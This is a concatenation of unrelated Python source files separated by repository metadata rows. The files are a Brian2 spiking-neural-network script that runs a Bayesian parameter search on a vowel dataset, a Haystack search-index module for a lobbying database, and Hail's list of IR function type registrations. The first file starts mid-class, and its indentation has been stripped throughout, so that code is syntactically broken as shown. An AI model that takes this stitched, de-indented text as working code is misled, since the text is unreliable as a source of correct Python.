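# analog sequence x of shape (T, dim) with A coding levels and n phase-
# shifted cosine receptive fields becomes a binary pattern of shape
# (T*A, dim*n) -- each sample expands into A one-hot rows (spike timing)
# and each feature into n phase columns:
#   x = np.random.rand(150, 12)                 # 150 frames, 12 features
#   spikes = Jv._encoding_cos_rank(x, 3, 10)    # coding_n=3, A=10
#   spikes.shape                                # -> (1500, 36)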
def encoding_latency_Jv(self, coding_f, analog_data, coding_n, min=0, max=np.pi):
f = lambda x: (max - min) * (x - np.min(x)) / (np.max(x) - np.min(x))
value = analog_data['value'].apply(f).apply(coding_f, n=coding_n, A=int(self.coding_duration))
return pd.DataFrame({'value': pd.Series(value), 'label': pd.Series(analog_data['label'])})
def get_series_data_list(self, data_frame, is_group=False):
data_frame_s = []
if not is_group:
for value in data_frame['value']:
data_frame_s.extend(value)
else:
for value in data_frame['value']:
data_frame_s.append(value)
label = data_frame['label']
return np.asarray(data_frame_s), label
###################################
# -----simulation parameter setting-------
coding_n = 3
dim = 12
coding_duration = 10
F_train = 1
F_test = 1
Dt = defaultclock.dt = 1 * ms
#-------class initialization----------------------
function = Function()
base = Base()
readout = Readout()
result = Result()
Jv = Jv_classification(coding_duration)
# -------data initialization----------------------
Jv.load_Data_Jv_all(data_path)
df_train = Jv.select_data(F_train, Jv.train, False)
df_test = Jv.select_data(F_test, Jv.test, False)
df_en_train = Jv.encoding_latency_Jv(Jv._encoding_cos_rank, df_train, coding_n)
df_en_test = Jv.encoding_latency_Jv(Jv._encoding_cos_rank, df_test, coding_n)
data_train_s, label_train = Jv.get_series_data_list(df_en_train, is_group=True)
data_test_s, label_test = Jv.get_series_data_list(df_en_test, is_group=True)
#-------get numpy random state------------
np_state = np.random.get_state()
############################################
# ---- define network run function----
def run_net(inputs, **parameter):
#---- set numpy random state for each run----
np.random.set_state(np_state)
# -----parameter setting-------
n_ex = 400
n_inh = int(n_ex/4)
n_input = dim * coding_n
n_read = n_ex+n_inh
R = parameter['R']
f = parameter['f']
A_EE = 30*f
A_EI = 60*f
A_IE = 19*f
A_II = 19*f
A_inE = 18*f
A_inI = 9*f
tau_ex = parameter['tau']*coding_duration
tau_inh = parameter['tau']*coding_duration
tau_read= 30
p_inE = 0.1
p_inI = 0.1
#------definition of equation-------------
neuron_in = '''
I = stimulus(t,i) : 1
'''
neuron = '''
tau : 1
dv/dt = (I-v) / (tau*ms) : 1 (unless refractory)
dg/dt = (-g)/(3*ms) : 1
dh/dt = (-h)/(6*ms) : 1
I = (g+h)+13.5: 1
x : 1
y : 1
z : 1
'''
neuron_read = '''
tau : 1
dv/dt = (I-v) / (tau*ms) : 1
dg/dt = (-g)/(3*ms) : 1
dh/dt = (-h)/(6*ms) : 1
I = (g+h): 1
'''
synapse = '''
w : 1
'''
on_pre_ex = '''
g+=w
'''
on_pre_inh = '''
h-=w
'''
# -----Neurons and Synapses setting-------
Input = NeuronGroup(n_input, neuron_in, threshold='I > 0', method='euler', refractory=0 * ms,
name = 'neurongroup_input')
G_ex = NeuronGroup(n_ex, neuron, threshold='v > 15', reset='v = 13.5', method='euler', refractory=3 * ms,
name ='neurongroup_ex')
G_inh = NeuronGroup(n_inh, neuron, threshold='v > 15', reset='v = 13.5', method='euler', refractory=2 * ms,
name ='neurongroup_in')
G_readout = NeuronGroup(n_read, neuron_read, method='euler', name='neurongroup_read')
S_inE = Synapses(Input, G_ex, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_inE')
S_inI = Synapses(Input, G_inh, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_inI')
S_EE = Synapses(G_ex, G_ex, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_EE')
S_EI = Synapses(G_ex, G_inh, synapse, on_pre = on_pre_ex ,method='euler', name='synapses_EI')
S_IE = Synapses(G_inh, G_ex, synapse, on_pre = on_pre_inh ,method='euler', name='synapses_IE')
S_II = Synapses(G_inh, G_inh, synapse, on_pre = on_pre_inh ,method='euler', name='synapses_I')
S_E_readout = Synapses(G_ex, G_readout, 'w = 1 : 1', on_pre=on_pre_ex, method='euler')
S_I_readout = Synapses(G_inh, G_readout, 'w = 1 : 1', on_pre=on_pre_inh, method='euler')
#-------initialization of neuron parameters----------
G_ex.v = '13.5+1.5*rand()'
G_inh.v = '13.5+1.5*rand()'
G_readout.v = '0'
G_ex.g = '0'
G_inh.g = '0'
G_readout.g = '0'
G_ex.h = '0'
G_inh.h = '0'
G_readout.h = '0'
G_ex.tau = tau_ex
G_inh.tau = tau_inh
G_readout.tau = tau_read
[G_ex, G_inh] = base.allocate([G_ex, G_inh], 5, 5, 20)
# -------initialization of network topology and synapses parameters----------
S_inE.connect(condition='j<0.3*N_post', p = p_inE)
S_inI.connect(condition='j<0.3*N_post', p = p_inI)
S_EE.connect(condition='i != j', p='0.3*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)')
S_EI.connect(p='0.2*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)')
S_IE.connect(p='0.4*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)')
S_II.connect(condition='i != j', p='0.1*exp(-((x_pre-x_post)**2+(y_pre-y_post)**2+(z_pre-z_post)**2)/R**2)')
S_E_readout.connect(j='i')
S_I_readout.connect(j='i+n_ex')
S_inE.w = function.gamma(A_inE, S_inE.w.shape)
S_inI.w = function.gamma(A_inI, S_inI.w.shape)
S_EE.w = function.gamma(A_EE, S_EE.w.shape)
S_IE.w = function.gamma(A_IE, S_IE.w.shape)
S_EI.w = function.gamma(A_EI, S_EI.w.shape)
S_II.w = function.gamma(A_II, S_II.w.shape)
S_EE.pre.delay = '1.5*ms'
S_EI.pre.delay = '0.8*ms'
S_IE.pre.delay = '0.8*ms'
S_II.pre.delay = '0.8*ms'
# ------create network-------------
net = Network(collect())
net.store('init')
# ------run network-------------
stimulus = TimedArray(inputs[0], dt=Dt)
duration = inputs[0].shape[0]
net.run(duration * Dt)
states = net.get_states()['neurongroup_read']['v']
net.restore('init')
return (states, inputs[1])
def parameters_search(**parameter):
# ------parallel run for train-------
states_train_list = pool.map(partial(run_net, **parameter), [(x) for x in zip(data_train_s, label_train)])
# ----parallel run for test--------
states_test_list = pool.map(partial(run_net, **parameter), [(x) for x in zip(data_test_s, label_test)])
# ------Readout---------------
states_train, states_test, _label_train, _label_test = [], [], [], []
for train in states_train_list :
states_train.append(train[0])
_label_train.append(train[1])
for test in states_test_list:
states_test.append(test[0])
_label_test.append(test[1])
states_train = (MinMaxScaler().fit_transform(np.asarray(states_train))).T
states_test = (MinMaxScaler().fit_transform(np.asarray(states_test))).T
score_train, score_test = readout.readout_sk(states_train, states_test,
np.asarray(_label_train), np.asarray(_label_test),
solver="lbfgs", multi_class="multinomial")
# ----------show results-----------
print('parameters %s' % parameter)
print('Train score: ', score_train)
print('Test score: ', score_test)
return score_test
##########################################
# -------BO parameters search---------------
if __name__ == '__main__':
core = 10
pool = Pool(core)
optimizer = bayes_opt.BayesianOptimization(
f=parameters_search,
pbounds={'R': (0.01, 2), 'f': (0.01, 2), 'tau':(0.01, 2)},
verbose=2,
random_state=np.random.RandomState(),
)
# from bayes_opt.util import load_logs
# load_logs(optimizer, logs=["./BO_res_Jv.json"])
logger = bayes_opt.observer.JSONLogger(path="./BO_res_Jv.json")
optimizer.subscribe(bayes_opt.event.Events.OPTMIZATION_STEP, logger)
optimizer.maximize(
init_points=10,
n_iter=200,
acq='ucb',
kappa=2.576,
xi=0.0,
) | [
"[email protected]"
] | |
02de053f7a35ad14f7c9469e279ff827159d5414 | 904bf81488ce47c93453a8a841403e831f03ebe0 | /tx_lobbying/search_indexes.py | edb9f8e6255ec97382048159f312a5a1398c6c77 | [
"Apache-2.0"
] | permissive | texastribune/tx_lobbying | b7b26ed8acb6059f46bf1e4285af69398795b074 | 81dd911667e5368b874a56d5fba8e1613f7027ee | refs/heads/master | 2020-04-01T09:25:11.457807 | 2015-05-19T03:34:53 | 2015-05-19T03:34:53 | 7,674,962 | 1 | 3 | null | 2015-05-28T03:08:54 | 2013-01-17T21:47:06 | Python | UTF-8 | Python | false | false | 920 | py | """
Haystack search indicies.
I denormalize thing here to try and make things easier on the database later.
"""
from haystack import indexes
from .models import Lobbyist, Interest
class LobbyistIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='name', document=True)
content_auto = indexes.EdgeNgramField(model_attr='name')
url = indexes.CharField()
def get_model(self):
return Lobbyist
def get_updated_field(self):
return 'updated_at'
def prepare_url(self, obj):
return obj.get_absolute_url()
class InterestIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(model_attr='name', document=True)
content_auto = indexes.EdgeNgramField(model_attr='name')
url = indexes.CharField()
def get_model(self):
return Interest
def prepare_url(self, obj):
return obj.get_absolute_url()
| [
"[email protected]"
] | |
a283425bbb4f90949b0edfcd5f68564d3833b84f | 050d5f569497b8e04272b2b6955ac6f844e094e7 | /hail/python/hail/ir/register_functions.py | 814b1dbcbd0074c87fe410eb5acaeab94fbd9ce5 | [
"MIT"
] | permissive | steveherrin/hail | a68460870aa8207de628ee2054a7af889ef8e07c | edd724faf9443d37cca6a22d4c0a2af939130427 | refs/heads/master | 2020-07-29T14:03:50.642849 | 2019-09-20T16:11:21 | 2019-09-20T16:11:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,551 | py | import hail as hl
from hail.expr.nat import NatVariable
from .ir import register_function, register_session_function, register_seeded_function
def register_reference_genome_functions(rg):
from hail.expr.types import dtype
register_session_function(f"isValidContig({rg})", (dtype("str"),), dtype("bool"))
register_session_function(f"isValidLocus({rg})", (dtype("str"),dtype("int32"),), dtype("bool"))
register_session_function(f"getReferenceSequenceFromValidLocus({rg})", (dtype("str"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("str"))
register_session_function(f"getReferenceSequence({rg})", (dtype("str"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("str"))
def register_functions():
from hail.expr.types import dtype
register_function("flatten", (dtype("array<array<?T>>"),), dtype("array<?T>"))
register_function("difference", (dtype("set<?T>"),dtype("set<?T>"),), dtype("set<?T>"))
register_function("median", (dtype("set<?T:numeric>"),), dtype("?T"))
register_function("median", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("uniqueMinIndex", (dtype("array<?T>"),), dtype("int32"))
register_function("mean", (dtype("array<?T:numeric>"),), dtype("float64"))
register_function("toFloat32", (dtype("?T:numeric"),), dtype("float32"))
register_function("uniqueMaxIndex", (dtype("array<?T>"),), dtype("int32"))
register_function("toSet", (dtype("array<?T>"),), dtype("set<?T>"))
def array_floating_point_divide(arg_type, ret_type):
register_function("/", (arg_type, hl.tarray(arg_type),), hl.tarray(ret_type))
register_function("/", (hl.tarray(arg_type),arg_type), hl.tarray(ret_type))
register_function("/", (hl.tarray(arg_type),hl.tarray(arg_type)), hl.tarray(ret_type))
array_floating_point_divide(hl.tint32, hl.tfloat32)
array_floating_point_divide(hl.tint64, hl.tfloat32)
array_floating_point_divide(hl.tfloat32, hl.tfloat32)
array_floating_point_divide(hl.tfloat64, hl.tfloat64)
def ndarray_floating_point_divide(arg_type, ret_type):
register_function("/", (arg_type, hl.tndarray(arg_type, NatVariable()),), hl.tndarray(ret_type, NatVariable()))
register_function("/", (hl.tndarray(arg_type, NatVariable()), arg_type), hl.tndarray(ret_type, NatVariable()))
register_function("/", (hl.tndarray(arg_type, NatVariable()),
hl.tndarray(arg_type, NatVariable())), hl.tndarray(ret_type, NatVariable()))
ndarray_floating_point_divide(hl.tint32, hl.tfloat32)
ndarray_floating_point_divide(hl.tint64, hl.tfloat32)
ndarray_floating_point_divide(hl.tfloat32, hl.tfloat32)
ndarray_floating_point_divide(hl.tfloat64, hl.tfloat64)
register_function("values", (dtype("dict<?key, ?value>"),), dtype("array<?value>"))
register_function("[*:]", (dtype("array<?T>"),dtype("int32"),), dtype("array<?T>"))
register_function("[*:]", (dtype("str"),dtype("int32"),), dtype("str"))
register_function("get", (dtype("dict<?key, ?value>"),dtype("?key"),), dtype("?value"))
register_function("get", (dtype("dict<?key, ?value>"),dtype("?key"),dtype("?value"),), dtype("?value"))
register_function("max", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("nanmax", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("max", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("nanmax", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("max_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("nanmax_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("product", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("toInt32", (dtype("?T:numeric"),), dtype("int32"))
register_function("extend", (dtype("array<?T>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("argmin", (dtype("array<?T>"),), dtype("int32"))
register_function("toFloat64", (dtype("?T:numeric"),), dtype("float64"))
register_function("sort", (dtype("array<?T>"),), dtype("array<?T>"))
register_function("sort", (dtype("array<?T>"),dtype("bool"),), dtype("array<?T>"))
register_function("isSubset", (dtype("set<?T>"),dtype("set<?T>"),), dtype("bool"))
register_function("[*:*]", (dtype("str"),dtype("int32"),dtype("int32"),), dtype("str"))
register_function("[*:*]", (dtype("array<?T>"),dtype("int32"),dtype("int32"),), dtype("array<?T>"))
register_function("+", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("+", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("+", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("+", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("+", (dtype("ndarray<?T:numeric, ?nat>"), dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("+", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("**", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<float64>"))
register_function("**", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<float64>"))
register_function("**", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<float64>"))
register_function("**", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("**", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("**", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("append", (dtype("array<?T>"),dtype("?T"),), dtype("array<?T>"))
register_function("[:*]", (dtype("str"),dtype("int32"),), dtype("str"))
register_function("[:*]", (dtype("array<?T>"),dtype("int32"),), dtype("array<?T>"))
register_function("remove", (dtype("set<?T>"),dtype("?T"),), dtype("set<?T>"))
register_function("[]", (dtype("str"),dtype("int32"),), dtype("str"))
register_function("indexArray", (dtype("array<?T>"),dtype("int32"),), dtype("?T"))
register_function("[]", (dtype("dict<?key, ?value>"),dtype("?key"),), dtype("?value"))
register_function("dictToArray", (dtype("dict<?key, ?value>"),), dtype("array<tuple(?key, ?value)>"))
register_function("%", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("%", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("%", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("%", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("%", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("%", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("dict", (dtype("array<tuple(?key, ?value)>"),), dtype("dict<?key, ?value>"))
register_function("dict", (dtype("set<tuple(?key, ?value)>"),), dtype("dict<?key, ?value>"))
register_function("keys", (dtype("dict<?key, ?value>"),), dtype("array<?key>"))
register_function("min", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("nanmin", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("min", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("nanmin", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("min_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("nanmin_ignore_missing", (dtype("?T"),dtype("?T"),), dtype("?T"))
register_function("sum", (dtype("array<?T:numeric>"),), dtype("?T"))
register_function("toInt64", (dtype("?T:numeric"),), dtype("int64"))
register_function("contains", (dtype("dict<?key, ?value>"),dtype("?key"),), dtype("bool"))
register_function("contains", (dtype("array<?T>"),dtype("?T"),), dtype("bool"))
register_function("contains", (dtype("set<?T>"),dtype("?T"),), dtype("bool"))
register_function("-", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("-", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("-", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("-", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("-", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("-", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("addone", (dtype("int32"),), dtype("int32"))
register_function("isEmpty", (dtype("dict<?key, ?value>"),), dtype("bool"))
register_function("isEmpty", (dtype("array<?T>"),), dtype("bool"))
register_function("isEmpty", (dtype("set<?T>"),), dtype("bool"))
register_function("[:]", (dtype("array<?T>"),), dtype("array<?T>"))
register_function("[:]", (dtype("str"),), dtype("str"))
register_function("union", (dtype("set<?T>"),dtype("set<?T>"),), dtype("set<?T>"))
register_function("*", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("*", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("*", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("*", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("*", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("*", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("intersection", (dtype("set<?T>"),dtype("set<?T>"),), dtype("set<?T>"))
register_function("add", (dtype("set<?T>"),dtype("?T"),), dtype("set<?T>"))
register_function("argmax", (dtype("array<?T>"),), dtype("int32"))
register_function("//", (dtype("array<?T:numeric>"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("//", (dtype("array<?T:numeric>"),dtype("?T"),), dtype("array<?T>"))
register_function("//", (dtype("?T:numeric"),dtype("array<?T>"),), dtype("array<?T>"))
register_function("//", (dtype("ndarray<?T:numeric, ?nat>"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("//", (dtype("ndarray<?T:numeric, ?nat>"),dtype("?T"),), dtype("ndarray<?T, ?nat>"))
register_function("//", (dtype("?T:numeric"),dtype("ndarray<?T, ?nat>"),), dtype("ndarray<?T, ?nat>"))
register_function("keySet", (dtype("dict<?key, ?value>"),), dtype("set<?key>"))
register_function("qnorm", (dtype("float64"),), dtype("float64"))
register_function("oneHotAlleles", (dtype("call"),dtype("int32"),), dtype("array<int32>"))
register_function("dpois", (dtype("float64"),dtype("float64"),dtype("bool"),), dtype("float64"))
register_function("dpois", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("ploidy", (dtype("call"),), dtype("int32"))
register_function("||", (dtype("bool"),dtype("bool"),), dtype("bool"))
register_function("ppois", (dtype("float64"),dtype("float64"),dtype("bool"),dtype("bool"),), dtype("float64"))
register_function("ppois", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("log10", (dtype("float64"),), dtype("float64"))
register_function("isHet", (dtype("call"),), dtype("bool"))
register_function("isAutosomalOrPseudoAutosomal", (dtype("?T:locus"),), dtype("bool"))
register_function("testCodeUnification", (dtype("?x:numeric"),dtype("?x:int32"),), dtype("?x"))
register_seeded_function("rand_pois", (dtype("float64"),), dtype("float64"))
register_seeded_function("rand_pois", (dtype("int32"),dtype("float64"),), dtype("array<float64>"))
register_function("toFloat32", (dtype("str"),), dtype("float32"))
register_function("toFloat32", (dtype("bool"),), dtype("float32"))
register_function("isAutosomal", (dtype("?T:locus"),), dtype("bool"))
register_function("isPhased", (dtype("call"),), dtype("bool"))
register_function("isHomVar", (dtype("call"),), dtype("bool"))
register_function("corr", (dtype("array<float64>"),dtype("array<float64>"),), dtype("float64"))
register_function("log", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("log", (dtype("float64"),), dtype("float64"))
register_function("foobar2", (), dtype("int32"))
register_function("approxEqual", (dtype("float64"),dtype("float64"),dtype("float64"),dtype("bool"),dtype("bool"),), dtype("bool"))
register_function("plDosage", (dtype("array<?N:int32>"),), dtype("float64"))
register_function("includesEnd", (dtype("interval<?T>"),), dtype("bool"))
register_function("position", (dtype("?T:locus"),), dtype("int32"))
register_seeded_function("rand_unif", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("str", (dtype("?T"),), dtype("str"))
register_function("valuesSimilar", (dtype("?T"),dtype("?T"),dtype('float64'),dtype('bool'),), dtype("bool"))
register_function("replace", (dtype("str"),dtype("str"),dtype("str"),), dtype("str"))
register_function("exp", (dtype("float64"),), dtype("float64"))
register_function("&&", (dtype("bool"),dtype("bool"),), dtype("bool"))
register_function("compare", (dtype("int32"),dtype("int32"),), dtype("int32"))
register_function("triangle", (dtype("int32"),), dtype("int32"))
register_function("Interval", (dtype("?T"),dtype("?T"),dtype("bool"),dtype("bool"),), dtype("interval<?T>"))
register_function("contig", (dtype("?T:locus"),), dtype("str"))
register_function("Call", (dtype("bool"),), dtype("call"))
register_function("Call", (dtype("str"),), dtype("call"))
register_function("Call", (dtype("int32"),dtype("bool"),), dtype("call"))
register_function("Call", (dtype("int32"),dtype("int32"),dtype("bool"),), dtype("call"))
register_function("Call", (dtype("array<int32>"),dtype("bool"),), dtype("call"))
register_function("qchisqtail", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("binomTest", (dtype("int32"),dtype("int32"),dtype("float64"),dtype("int32"),), dtype("float64"))
register_function("qpois", (dtype("float64"),dtype("float64"),), dtype("int32"))
register_function("qpois", (dtype("float64"),dtype("float64"),dtype("bool"),dtype("bool"),), dtype("int32"))
register_function("is_finite", (dtype("float32"),), dtype("bool"))
register_function("is_finite", (dtype("float64"),), dtype("bool"))
register_function("inYPar", (dtype("?T:locus"),), dtype("bool"))
register_function("contingency_table_test", (dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{p_value: float64, odds_ratio: float64}"))
register_function("toInt32", (dtype("bool"),), dtype("int32"))
register_function("toInt32", (dtype("str"),), dtype("int32"))
register_function("foobar1", (), dtype("int32"))
register_function("toFloat64", (dtype("str"),), dtype("float64"))
register_function("toFloat64", (dtype("bool"),), dtype("float64"))
register_function("dbeta", (dtype("float64"),dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("Locus", (dtype("str"),), dtype("?T:locus"))
register_function("Locus", (dtype("str"), dtype("int32"),), dtype("?T:locus"))
register_function("LocusAlleles", (dtype("str"),), dtype("struct{locus: ?T, alleles: array<str>}"))
register_function("LocusInterval", (dtype("str"),dtype("bool"),), dtype("interval<?T:locus>"))
register_function("LocusInterval", (dtype("str"),dtype("int32"),dtype("int32"),dtype("bool"),dtype("bool"),dtype("bool"),), dtype("interval<?T:locus>"))
register_function("globalPosToLocus", (dtype("int64"),), dtype("?T:locus"))
register_function("locusToGlobalPos", (dtype("?T:locus"),), dtype("int64"))
register_function("liftoverLocus", (dtype(f"?T:locus"), dtype('float64'),), dtype(f"struct{{result:?U:locus,is_negative_strand:bool}}"))
register_function("liftoverLocusInterval", (dtype(f"interval<?T:locus>"), dtype('float64'),), dtype(f"struct{{result:interval<?U:locus>,is_negative_strand:bool}}"))
register_function("min_rep", (dtype("?T:locus"),dtype("array<str>"),), dtype("struct{locus: ?T, alleles: array<str>}"))
register_function("locus_windows_per_contig", (dtype("array<array<float64>>"),dtype("float64"),), dtype("tuple(array<int32>, array<int32>)"))
register_function("toBoolean", (dtype("str"),), dtype("bool"))
register_seeded_function("rand_bool", (dtype("float64"),), dtype("bool"))
register_function("pchisqtail", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_seeded_function("rand_cat", (dtype("array<float64>"),), dtype("int32"))
register_function("inYNonPar", (dtype("?T:locus"),), dtype("bool"))
register_function("+", (dtype("str"),dtype("str"),), dtype("str"))
register_function("**", (dtype("float32"),dtype("float32"),), dtype("float64"))
register_function("**", (dtype("int32"),dtype("int32"),), dtype("float64"))
register_function("**", (dtype("int64"),dtype("int64"),), dtype("float64"))
register_function("**", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("length", (dtype("str"),), dtype("int32"))
register_function("slice", (dtype("str"),dtype("int32"),dtype("int32"),), dtype("str"))
register_function("split", (dtype("str"),dtype("str"),dtype("int32"),), dtype("array<str>"))
register_function("split", (dtype("str"),dtype("str"),), dtype("array<str>"))
register_seeded_function("rand_gamma", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("UnphasedDiploidGtIndexCall", (dtype("int32"),), dtype("call"))
register_function("[]", (dtype("call"),dtype("int32"),), dtype("int32"))
register_function("sign", (dtype("int64"),), dtype("int64"))
register_function("sign", (dtype("float64"),), dtype("float64"))
register_function("sign", (dtype("float32"),), dtype("float32"))
register_function("sign", (dtype("int32"),), dtype("int32"))
register_function("unphasedDiploidGtIndex", (dtype("call"),), dtype("int32"))
register_function("gamma", (dtype("float64"),), dtype("float64"))
register_function("%", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("%", (dtype("int64"),dtype("int64"),), dtype("int64"))
register_function("%", (dtype("float32"),dtype("float32"),), dtype("float32"))
register_function("%", (dtype("int32"),dtype("int32"),), dtype("int32"))
register_function("fisher_exact_test", (dtype("int32"),dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{p_value: float64, odds_ratio: float64, ci_95_lower: float64, ci_95_upper: float64}"))
register_function("floor", (dtype("float64"),), dtype("float64"))
register_function("floor", (dtype("float32"),), dtype("float32"))
register_function("isNonRef", (dtype("call"),), dtype("bool"))
register_function("includesStart", (dtype("interval<?T>"),), dtype("bool"))
register_function("isHetNonRef", (dtype("call"),), dtype("bool"))
register_function("hardy_weinberg_test", (dtype("int32"),dtype("int32"),dtype("int32"),), dtype("struct{het_freq_hwe: float64, p_value: float64}"))
register_function("haplotype_freq_em", (dtype("array<int32>"),), dtype("array<float64>"))
register_function("nNonRefAlleles", (dtype("call"),), dtype("int32"))
register_function("abs", (dtype("float64"),), dtype("float64"))
register_function("abs", (dtype("float32"),), dtype("float32"))
register_function("abs", (dtype("int64"),), dtype("int64"))
register_function("abs", (dtype("int32"),), dtype("int32"))
register_function("endswith", (dtype("str"),dtype("str"),), dtype("bool"))
register_function("sqrt", (dtype("float64"),), dtype("float64"))
register_function("isnan", (dtype("float32"),), dtype("bool"))
register_function("isnan", (dtype("float64"),), dtype("bool"))
register_function("lower", (dtype("str"),), dtype("str"))
register_seeded_function("rand_beta", (dtype("float64"),dtype("float64"),), dtype("float64"))
register_seeded_function("rand_beta", (dtype("float64"),dtype("float64"),dtype("float64"),dtype("float64"),), dtype("float64"))
register_function("toInt64", (dtype("bool"),), dtype("int64"))
register_function("toInt64", (dtype("str"),), dtype("int64"))
register_function("testCodeUnification2", (dtype("?x"),), dtype("?x"))
register_function("contains", (dtype("str"),dtype("str"),), dtype("bool"))
register_function("contains", (dtype("interval<?T>"),dtype("?T"),), dtype("bool"))
register_function("entropy", (dtype("str"),), dtype("float64"))
register_function("filtering_allele_frequency", (dtype("int32"),dtype("int32"),dtype("float64"),), dtype("float64"))
register_function("gqFromPL", (dtype("array<?N:int32>"),), dtype("int32"))
register_function("startswith", (dtype("str"),dtype("str"),), dtype("bool"))
register_function("ceil", (dtype("float32"),), dtype("float32"))
register_function("ceil", (dtype("float64"),), dtype("float64"))
register_function("json", (dtype("?T"),), dtype("str"))
register_function("strip", (dtype("str"),), dtype("str"))
register_function("firstMatchIn", (dtype("str"),dtype("str"),), dtype("array<str>"))
register_function("isEmpty", (dtype("interval<?T>"),), dtype("bool"))
register_function("~", (dtype("str"),dtype("str"),), dtype("bool"))
register_function("mkString", (dtype("set<str>"),dtype("str"),), dtype("str"))
register_function("mkString", (dtype("array<str>"),dtype("str"),), dtype("str"))
register_function("dosage", (dtype("array<?N:float64>"),), dtype("float64"))
register_function("upper", (dtype("str"),), dtype("str"))
register_function("overlaps", (dtype("interval<?T>"),dtype("interval<?T>"),), dtype("bool"))
register_function("downcode", (dtype("call"),dtype("int32"),), dtype("call"))
register_function("inXPar", (dtype("?T:locus"),), dtype("bool"))
register_function("format", (dtype("str"),dtype("?T:tuple"),), dtype("str"))
register_function("pnorm", (dtype("float64"),), dtype("float64"))
register_function("is_infinite", (dtype("float32"),), dtype("bool"))
register_function("is_infinite", (dtype("float64"),), dtype("bool"))
register_function("isHetRef", (dtype("call"),), dtype("bool"))
register_function("isMitochondrial", (dtype("?T:locus"),), dtype("bool"))
